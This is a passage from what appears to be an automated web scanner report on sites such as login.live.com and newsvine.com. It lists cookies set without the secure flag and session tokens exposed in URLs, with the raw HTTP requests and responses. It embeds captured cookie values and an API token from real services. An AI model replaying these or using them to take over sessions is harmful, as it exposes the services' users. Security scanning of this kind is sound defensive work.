Cookie: MUID=DC63BAA44C3843F38378B4BB213E0A6F; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; xidseq=1; mktstate=S=821848180&U=&E=&P=&B=en-us; mkt1=norm=en-us; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; wla42=

Response

10.12. https://login.live.com/pp900/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/pp900/

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1296342794&co=1&id=N; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4c2d8b39-4613-4bc8-bb07-53657b3f42ca; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pp900/ HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

10.13. https://login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-df41315e-45c6-4d60-b893-881795a1cb21; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

10.14. https://login.live.com/ppsecure/secure.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/ppsecure/secure.srf

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

MSPRequ=lt=1296342796&co=1&id=N; path=/;version=1
MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-23efde8d-b534-4b63-8d36-38dc6e68d0f0; path=/;version=1

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ppsecure/secure.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

10.15. https://login.live.com/resetpw.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://login.live.com
Path:	/resetpw.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-4b999dd4-4e4f-4340-b8dc-e3af3429245c; path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /resetpw.srf HTTP/1.1
Host: login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mktstate=S=821848180&U=&E=&P=&B=en-us; xidseq=1; MSPRequ=lt=1296342779&id=251248&co=1; E=P:+YS7nCCOzYg=:9a/xBpNSiIAnbLqWtakDxo+wuvmRENPdouyOF/TBWFA=:F; mkt1=norm=en-us; MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc; wlidperf=throughput=15&latency=192; xid=feb5de0d-c322-4fbd-9773-2de0986e2107&&BL2xxxxxxC504&61; MUID=DC63BAA44C3843F38378B4BB213E0A6F; wla42=;

Response

10.16. https://msnia.login.live.com/ppsecure/post.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://msnia.login.live.com
Path:	/ppsecure/post.srf

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

MSPOK=$uuid-0b57eae4-cbe7-4619-b132-61d19b680035; domain=login.live.com;path=/;version=1

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ppsecure/post.srf HTTP/1.1
Host: msnia.login.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.17. https://sb.voicefive.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://sb.voicefive.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b HTTP/1.1
Host: sb.voicefive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: https://sb.voicefive.com/b2?
Date: Sun, 30 Jan 2011 01:37:06 GMT
Connection: close
Set-Cookie: UID=c9bed8b-173.223.190.110-1296351426; expires=Tue, 29-Jan-2013 01:37:06 GMT; path=/; domain=.voicefive.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.18. https://www.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=55d515b4f7dadf9aee6395750020b187; expires=Sat, 25-Jan-2031 17:02:03 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.newsvine.com
Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sprout=2_PqiLNG8SFmQW8X%2BSbvHhIaQDDrylppT5AYg38YcbZ9nVTR8kG5RsiVu%2Byu1tJBD9uostGX%2FgO7wgSaC9LY0BxepgpfVGhwtOvjqbjk9G%2F0aWJY3jKGNJFq0uN4pAaO2V7eJc%2FrvMgTEqRy9ueckdj0wQyfJmL0oh4o9pwBcp9RbpE129gAZ0vY9RD8lhmoOR3DT1xy5pJRukUI4myv8AbN7gTgSVWGrjBguMbtU2gBmjNsA9C6eGORSajKZnC%2B%2B0; TZM=-360; jt_time=1296399959031; vid=d22bc33559f8a0701e021885c03ad2c9; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

10.19. https://www.newsvine.com/_action/user/logout previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_action/user/logout

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /_action/user/logout HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 03:20:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=a518bd3650bb791008fc921ee62dad0e; expires=Sat, 25-Jan-2031 03:20:10 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Set-Cookie: sprout=deleted; expires=Sat, 30-Jan-2010 03:20:14 GMT; path=/; domain=.newsvine.com
Location: http://www.newsvine.com/_action/user/logout?domains=newsvine.msnbc.redacted,newsvine.nbcsports.msnbc.com,newsvine.todayshow.com,newsvine.today.com&redirect=http%3A%2F%2Fwww.newsvine.com%3F1272465988
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Connection: close

10.20. https://www.newsvine.com/_nv/accounts/global/information previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/global/information

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/global/information HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3baaa49edd0123eafe283532e331e3c0; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/accountSettingsLogin?tab=global&item=information&redirect=https%3A%2F%2Fwww.newsvine.com%2F_nv%2Faccounts%2Fglobal%2Finformation
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

10.21. https://www.newsvine.com/_nv/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=f8216a56010cce7056bb2bebc2b8ea2f; expires=Sat, 25-Jan-2031 01:58:45 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.22. https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/emailAlerts

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/emailAlerts HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:53 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=0e0c419af9db7beaa9782211b1d63042; expires=Sat, 25-Jan-2031 03:14:53 GMT; path=/; domain=.newsvine.com
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html
Connection: close

10.23. https://www.newsvine.com/_nv/accounts/msnbc/newsletters previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/msnbc/newsletters

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=612c76b17edbcde9ea20fe784e8a625d; expires=Sat, 25-Jan-2031 01:23:00 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/msnbc/newsletters HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.24. https://www.newsvine.com/_nv/accounts/register previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/accounts/register

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=209e83103b98465a328a2c9ac4b644ca; expires=Sat, 25-Jan-2031 01:22:53 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/accounts/register HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.25. https://www.newsvine.com/_nv/api/accounts/login previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/login HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 01:22:51 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=aa6836e6849505e061ea2e467e70f836; expires=Sat, 25-Jan-2031 01:22:51 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 01:23:51 GMT
Vary: Accept-Encoding
Content-Length: 97
Content-Type: application/json
Connection: close

{"data":{"errors":{"L2":"Please enter your email address and password."}},"statusCode":"failure"}

10.26. https://www.newsvine.com/_nv/api/accounts/resetPassword previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.newsvine.com
Path:	/_nv/api/accounts/resetPassword

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_nv/api/accounts/resetPassword HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 03:14:02 GMT
Server: Apache/2.2.9 (Debian)
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=b87462d701086cc5258ca445f8422d6b; expires=Sat, 25-Jan-2031 03:14:02 GMT; path=/; domain=.newsvine.com
Cache-Control: max-age=60
Expires: Sun, 30 Jan 2011 03:15:02 GMT
Vary: Accept-Encoding
Content-Length: 100
Content-Type: application/json
Connection: close

{"data":{"errors":{"RP1":"Please enter your email address or domain name."}},"statusCode":"failure"}

11. Session token in URL previous next
There are 21 instances of this issue:

http://clk.redcated/go/286026710/direct
http://cosmiclog.msnbc.redacted/
http://local.redacted/
http://local.redacted/gas-traffic.aspx
http://local.redacted/hourly.aspx
http://local.redacted/movies-events.aspx
http://local.redacted/news.aspx
http://local.redacted/restaurants.aspx
http://local.redacted/sports.aspx
http://local.redacted/ten-day.aspx
http://local.redacted/weather.aspx
http://stackauth.com/auth/global/read
http://thelastword.msnbc.redacted/
http://www.amazon.com/gp/product/0470650923
http://www.amazon.com/gp/product/0672333368
http://www.amazon.com/gp/product/0981511821
http://www.amazon.com/gp/product/184968006X
http://www.amazon.com/gp/product/1935182374
http://www.facebook.com/extern/login_status.php
http://www.redacted/scp/AuthServiceTwitter.aspx
http://www.thespacereview.com/

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

11.1. http://clk.redcated/go/286026710/direct previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://clk.redcated
Path:	/go/286026710/direct

Issue detail

The URL in the request appears to contain a session token within the query string:

http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.2/01&clickTag3=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.3/01&clickTag4=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.4/01&clickTag5=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.5/01&clickTag6=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.6/01

Request

GET /go/286026710/direct;vt.1;ai.195291342;ct.$num$/01/&ArmClickToken=$num$ver=1&clickTag1=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.1/01&clickTag2=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.2/01&clickTag3=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.3/01&clickTag4=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.4/01&clickTag5=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.5/01&clickTag6=!~!click!~!http://clk.redcated/go/286026710/direct;vt.1;ai.195291342;ct.6/01 HTTP/1.1
Host: clk.redcated
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://us.ishares.com/home.htm?cmp=keepevolving&chn=BA&c=MSN
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: AA002=001296353223-3933257; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: MUID=0A4C5DE803D0423D892C3F0C8538F026; expires=Thursday, 18-Aug-2011 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach00=bab9/1c5b3; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Set-Cookie: ach01=ba3e8ce/1c5b3/110c6bd6/bab9/4d44c7c7; expires=Tuesday, 29-Jan-2013 00:00:00 GMT; path=/; domain=.redcated
Connection: close
Date: Sun, 30 Jan 2011 02:07:03 GMT
Connection: close

11.2. http://cosmiclog.msnbc.redacted/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://cosmiclog.msnbc.redacted
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://www.plosone.org/article/info:doi/10.1371/journal.pone.0016292;jsessionid=9E6895D8F62E08DA00CA29E1E6705A22.ambra02

Request

GET / HTTP/1.1
Host: cosmiclog.msnbc.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

11.3. http://local.redacted/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET / HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:29 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA29
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8349c3df213b40858bffbf1ed5e320d4; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=AEB046B1DD804980BD22C1D7DC865D48; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:29 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 45759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX+boa&cat=270&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.4. http://local.redacted/gas-traffic.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/gas-traffic.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq
http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=458&h=300&o=jpeg&b=r,shading.hill,mkt.en-US&z=10&t=f&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /gas-traffic.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 02:09:28 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA27
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=5b47497cc43743d9be4c3d0002efa31f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=72D4472BCF114A3497BE87B9061DAD51; domain=.redacted; expires=Thu, 18-Aug-2011 02:09:28 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 44553

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...
<a href="http://www.bing.com/maps/default.aspx?trfc=1&where1=Dallas,TX&FORM=MSNLEC&encType=1"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=458&h=300&o=jpeg&b=r,shading.hill,mkt.en-US&z=10&t=f&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" alt="local traffic map" height="300" width="458" /></a>
...[SNIP]...

11.5. http://local.redacted/hourly.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/hourly.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /hourly.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:52 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA25
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=fe9b558f11c048c5b0bcfead5c27909c; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=D700EC8FE6A84E6E86AF10C957726EEB; domain=.redacted; expires=Wed, 17-Aug-2011 23:47:52 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 52446

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<a class="attr" href="http://www.bing.com/maps/?q=Dallas+TX&FORM=MSNLEC"><img src="http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq" title="Dallas" alt="Dallas" height="124" width="124" /></a>
...[SNIP]...

11.6. http://local.redacted/movies-events.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://local.redacted
Path:	/movies-events.aspx

Issue detail

The response contains the following links that appear to contain session tokens:

http://ecn.api.tiles.virtualearth.net/api/GetMap.ashx?c=32.78517781,-96.81912677&w=124&h=124&o=jpeg&b=r,shading.hill,mkt.en-US&z=8&token=AWrgcQkAAAByZSh_0bq4X0iGtxe4abWq

Request

GET /movies-events.aspx HTTP/1.1
Host: local.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:47:43 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA28
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=362ea74ed69b4e3e91979daf6227ebc5; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
